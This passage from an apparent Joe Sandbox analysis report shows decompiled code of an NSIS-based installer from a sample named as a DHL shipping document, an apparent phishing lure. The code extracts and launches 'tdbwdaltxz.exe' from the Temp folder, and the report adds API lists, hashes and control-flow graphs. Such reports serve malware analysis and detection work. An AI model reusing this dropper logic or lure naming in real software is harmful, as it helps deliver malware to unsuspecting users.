							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                        0x0040176f
                        0x00401776
                        0x00401782
                        0x00401785
                        0x0040178a
                        0x0040178d
                        0x00401794
                        0x004017b0
                        0x00401796
                        0x00401797
                        0x00401797
                        0x004017b6
                        0x004017bb
                        0x004017bb
                        0x004017bf
                        0x004017c2
                        0x004017c7
                        0x004017c9
                        0x004017cb
                        0x004017d0
                        0x004017d0
                        0x004017db
                        0x004017db
                        0x004017ec
                        0x004017ee
                        0x004017ee
                        0x004017ef
                        0x004017ef
                        0x004017f2
                        0x004017f5
                        0x004017f8
                        0x004017f8
                        0x004017ff
                        0x0040180e
                        0x00401813
                        0x00401816
                        0x00401819
                        0x00000000
                        0x00000000
                        0x0040181b
                        0x0040181e
                        0x00401874
                        0x00401879
                        0x004015b6
                        0x0040292e
                        0x0040292e
                        0x00402c2a
                        0x00402c2d
                        0x00402c2d
                        0x00000000
                        0x00401820
                        0x00401826
                        0x0040182d
                        0x0040183a
                        0x00401845
                        0x0040185b
                        0x0040185b
                        0x0040185e
                        0x00000000
                        0x00401864
                        0x00401864
                        0x00401865
                        0x00401882
                        0x00402c33
                        0x00402c33
                        0x00402c33
                        0x00401867
                        0x00401867
                        0x00401868
                        0x00401493
                        0x0040239d
                        0x0040239d
                        0x0040239d
                        0x00401865
                        0x0040185e
                        0x00402c35
                        0x00402c39
                        0x00402c39
                        0x00401892
                        0x00401897
                        0x004018a5
                        0x004018aa
                        0x004018b0
                        0x004018b4
                        0x004018b6
                        0x004018be
                        0x004018ca
                        0x004018b8
                        0x004018b8
                        0x004018bc
                        0x00000000
                        0x00000000
                        0x004018bc
                        0x004018d3
                        0x004018d9
                        0x004018db
                        0x00000000
                        0x004018e1
                        0x004018e1
                        0x004018e4
                        0x004018fc
                        0x004018e6
                        0x004018e9
                        0x004018f2
                        0x004018f2
                        0x00401901
                        0x00401906
                        0x00402398
                        0x00000000
                        0x00402398
                        0x00000000

                        APIs
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00000000,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                        • API String ID: 1941528284-1764132218
                        • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                        • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                        • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                        • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                        C-Code - Quality: 100%
                        			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                        0x004069dc
                        0x004069e5
                        0x004069e7
                        0x004069e7
                        0x004069eb
                        0x004069fe
                        0x004069f8
                        0x004069f8
                        0x004069f8
                        0x00406a17
                        0x00406a2b
                        0x00406a32

                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                        • wsprintfW.USER32 ref: 00406A17
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%S.dll$UXTHEME$\
                        • API String ID: 2200240437-1946221925
                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                        C-Code - Quality: 100%
                        			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                        0x00405ba4
                        0x00405ba8
                        0x00405bab
                        0x00405bb1
                        0x00405bb5
                        0x00405bb9
                        0x00405bc1
                        0x00405bc8
                        0x00405bce
                        0x00405bd5
                        0x00405bdc
                        0x00405be4
                        0x00405be6
                        0x00000000
                        0x00405be6
                        0x00405bf0
                        0x00405bf7
                        0x00405c0d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405c0f
                        0x00405c13

                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                        • GetLastError.KERNEL32 ref: 00405BF0
                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                        • GetLastError.KERNEL32 ref: 00405C0F
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3449924974-3916508600
                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 538 406bb0-406bd3 539 406bd5-406bd8 538->539 540 406bdd-406be0 538->540 541 4075fd-407601 539->541 542 406be3-406bec 540->542 543 406bf2 542->543 544 4075fa 542->544 545 406bf9-406bfd 543->545 546 406d39-4073e0 543->546 547 406c9e-406ca2 543->547 548 406d0e-406d12 543->548 544->541 549 406c03-406c10 545->549 550 4075e5-4075f8 545->550 556 4073e2-4073f8 546->556 557 4073fa-407410 546->557 554 406ca8-406cc1 547->554 555 40754e-407558 547->555 551 406d18-406d2c 548->551 552 40755d-407567 548->552 549->544 558 406c16-406c5c 549->558 550->541 559 406d2f-406d37 551->559 552->550 560 406cc4-406cc8 554->560 555->550 561 407413-40741a 556->561 557->561 562 406c84-406c86 558->562 563 406c5e-406c62 558->563 559->546 559->548 560->547 564 406cca-406cd0 560->564 567 407441-40744d 561->567 568 40741c-407420 561->568 571 406c94-406c9c 562->571 572 406c88-406c92 562->572 569 406c64-406c67 GlobalFree 563->569 570 406c6d-406c7b GlobalAlloc 563->570 565 406cd2-406cd9 564->565 566 406cfa-406d0c 564->566 573 406ce4-406cf4 GlobalAlloc 565->573 574 406cdb-406cde GlobalFree 565->574 566->559 567->542 575 407426-40743e 568->575 576 4075cf-4075d9 568->576 569->570 570->544 578 406c81 570->578 571->560 572->571 572->572 573->544 573->566 574->573 575->567 576->550 578->562
                        C-Code - Quality: 98%
                        			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
